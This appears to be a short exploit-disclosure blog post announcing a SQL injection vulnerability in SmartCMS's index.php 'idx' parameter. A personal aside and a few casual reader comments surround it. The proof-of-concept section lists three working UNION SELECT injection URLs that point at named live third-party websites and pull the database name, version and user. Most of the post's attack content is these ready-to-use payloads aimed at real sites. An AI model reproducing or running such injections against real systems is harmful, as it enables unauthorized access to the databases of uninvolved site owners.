LFI to RCE via access_log injection

SmartCMS <= SQL Injection Vuln


Hei you out there... :)

It's been a long time since my last post..
Well i've been busy with many things and i have a daughter now (6 month). Very beautiful and smart daughter (like her father of course! hahahaha..). We call her "amora". :D


[o] SmartCMS <= SQL Injection Vulnerability

Software : SmartMS
Version   : n/a
Vendor   : http://smartcms.nl/
Author   : NoGe
Contact  : noge[dot]code[at]gmail[dot]com


[o] Exploit

http://localhost/[path]/index.php?idx=[SQLi]


[o] PoC

http://www.smartcms.nl/cms2/sites/1010/index.php?idx=566+AND+1=2+UNION+ALL+SELECT+database()--
http://www.pokey.nl/cms2/sites/1086/index.php?idx=3397+AND+1=2+UNION+ALL+SELECT+version()--
http://www.devriesenrijke.nl/cms2/sites/1077/index.php?idx=2605+AND+1=2+UNION+ALL+SELECT+user()--

Comments

Anonymous said…
I wanna have a daughter too.
Anonymous said…
PREEEETTTTTTTT.......
Anonymous said…
bg, posting ttg oracle lah pliss
basicnya jg gpp :(